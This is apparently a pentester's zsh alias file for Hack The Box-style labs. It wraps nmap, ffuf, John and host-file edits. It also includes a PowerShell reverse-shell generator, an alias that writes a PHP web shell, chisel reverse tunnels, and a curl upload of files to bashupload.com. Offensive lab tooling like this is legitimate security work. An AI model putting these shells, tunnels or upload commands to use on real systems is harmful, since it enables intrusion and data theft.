-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathaliases.zsh
209 lines (179 loc) · 5.59 KB
/
aliases.zsh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
# Misc
list_ips() {
ip a show scope global | awk '/^[0-9]+:/ { sub(/:/,"",$2); iface=$2 } /^[[:space:]]*inet / { split($2, a, "/"); print "[\033[96m" iface"\033[0m] "a[1] }'
}
ls_pwd() {
echo -e "[\e[96m`pwd`\e[0m]\e[34m" && ls && echo -en "\e[0m"
}
mkdir_cd() {
mkdir $1 && cd $_
}
alias www="list_ips && ls_pwd && sudo python3 -m http.server 80"
alias tun0="ifconfig tun0 | grep 'inet ' | cut -d' ' -f10 | tr -d '\n' | xclip -sel clip"
# seclist_path
get_seclists_dir() {
local dir
if [ -d "/opt/seclists" ]; then
dir="/opt/seclists"
elif [ -d "/usr/share/seclists" ]; then
dir="/usr/share/seclists"
elif [ -n "$SECLISTS_PATH" ]; then
dir="$SECLISTS_PATH"
else
echo "Error: Could not find SecLists directory. Please set SECLISTS_PATH environment variable or install SecLists in a standard location." >&2
return 1
fi
echo $dir
return 0
}
# Hashcracking
rock_john() {
if [ $# -eq 0 ]
then
echo "[i] Usage: rock_john wordlist (options)"
else
john "${@}" --wordlist=/usr/share/wordlists/rockyou.txt
fi
}
# Portscanning
nmap_default () {
if [ $# -eq 0 ]
then
echo "[i] Usage: nmap_default ip (options)"
else
[ ! -d "./nmap" ] && echo "[i] Creating $(pwd)/nmap..." && mkdir nmap
sudo nmap -sCV -T4 --min-rate 10000 "${@}" -v -oA nmap/tcp_default
fi
}
nmap_udp () {
if [ $# -eq 0 ]
then
echo "[i] Usage: nmap_udp ip (options)"
else
[ ! -d "./nmap" ] && echo "[i] Creating $(pwd)/nmap..." && mkdir nmap
sudo nmap -sUCV -T4 --min-rate 10000 "${@}" -v -oA nmap/udp_default
fi
}
# Reverse shells
gen_ps_rev () {
if [ "$#" -ne 2 ];
then
echo "[i] Usage: gen_ps_rev ip port"
else
SHELL=`cat ~/zsh-aliases/shells/ps_rev.txt | sed s/x.x.x.x/$1/g | sed s/yyyy/$2/g | iconv -f utf8 -t utf16le | base64 -w 0`
echo "powershell -ec $SHELL" | xclip -sel clip
fi
}
# TTY upgrades
py_tty_upgrade () {
echo "py_tty_upgrade is deprecated, calling uptty instead..."
uptty
}
py3_tty_upgrade () {
echo "py3_tty_upgrade is deprecated, calling uptty instead..."
uptty
}
uptty () {
echo "python3 -c 'import pty;pty.spawn(\"/bin/bash\")';python -c 'import pty;pty.spawn(\"/bin/bash\")'"| xclip -sel clip
}
alias script_tty_upgrade="echo '/usr/bin/script -qc /bin/bash /dev/null'| xclip -sel clip"
alias tty_fix="stty raw -echo; fg; reset"
alias tty_conf="stty -a | sed 's/;//g' | head -n 1 | sed 's/.*baud /stty /g;s/line.*//g' | xclip -sel clip"
# Ffuf vhost
vhost() {
if [ "$#" -lt 1 ]; then
echo "[i] Usage: vhost <domain> (extra arguments)"
return 1
fi
local seclists_dir
seclists_dir=$(get_seclists_dir)
local exit_status=$?
if [[ $exit_status -ne 0 ]]; then
return 1
fi
local url=$1
# Default to http if no protocol specified, but allow optional specifying of the protocol
# So we can also use it against HTTPS
if [[ ! "$url" =~ ^https?:// ]]; then
url="http://$url"
fi
local wordlist="$seclists_dir/Discovery/DNS/bitquark-subdomains-top100000.txt"
ffuf -H "Host: FUZZ.$1" -u $url -w "$wordlist" "${@:2}"
}
fuzz_dir() {
if [ "$#" -lt 1 ]; then
echo "[i] Usage: fuzz_dir <url> [-w <wordlist>] [ffuf options]"
return 1
fi
local url="$1"
shift
local seclists_dir
seclists_dir=$(get_seclists_dir)
local exit_status=$?
if [[ $exit_status -ne 0 ]]; then
return 1
fi
local default_wordlist="$seclists_dir/Discovery/Web-Content/raft-large-directories.txt"
local wordlist="$default_wordlist"
local ffuf_args=()
# Parse arguments
while [[ $# -gt 0 ]]; do
case $1 in
-w)
wordlist="$2"
shift 2
;;
*)
ffuf_args+=("$1")
shift
;;
esac
done
ffuf -u "$url/FUZZ" -w "$wordlist" -e .php,.asp,.txt,.php.old,.html,.php.bak,.bak,.aspx "${ffuf_args[@]}"
}
# Chisel
chisel_socks() {
if [ "$#" -ne 2 ];
then
echo "[i] Usage: chisel_socks <ip> <server_port>"
else
echo "[+] copied chisel client -v $1:$2 R:socks in clipboard"
echo "./chisel client -v $1:$2 R:socks" | xclip -sel c
~/zsh-aliases/tools/chisel server -v -p $2 --reverse
fi
}
chisel_forward() {
if [ "$#" -ne 4 ]; then
echo "[i] Usage: chisel_remote <local_ip> <local_port> <remote_ip> <remote_port>"
else
echo "./chisel client $1:8888 R:$2:$3:$4" | xclip -sel clip
echo "[+] Copied to clipboard: ./chisel client $1:8888 R:$2:$3:$4"
echo "[+] Run this on the target machine"
~/zsh-aliases/tools/chisel server -p 8888 --reverse
fi
}
# Hosts
addhost() {
if [ "$#" -ne 2 ]; then
echo "[i] Usage: addhost <ip> <hostname>"
return 1
fi
ip="$1"
hostname="$2"
if grep -q "^$ip" /etc/hosts; then
sudo sed -i "/^$ip/s/$/ $hostname/" /etc/hosts
echo "[+] Appended $hostname to existing entry for $ip in /etc/hosts"
else
echo "$ip $hostname" | sudo tee -a /etc/hosts > /dev/null
echo "[+] Added new entry: $ip $hostname to /etc/hosts"
fi
grep "^$ip" /etc/hosts
}
# Other stuff
alias start_htb="python3 ~/zsh-aliases/start_htb.py"
alias linpeas="curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -s --output lin.sh"
alias upload='curl bashupload.com -T "${@}"'
alias phpcmd='echo "<?=\`\$_GET[0]\`?>" > cmd.php && echo "[+] wrote <?=\`\$_GET[0]\`?> in cmd.php"'
alias burl='curl -x http://127.0.0.1:8080/ -k'
# Path fix
export PATH=~/zsh-aliases/shells/:$PATH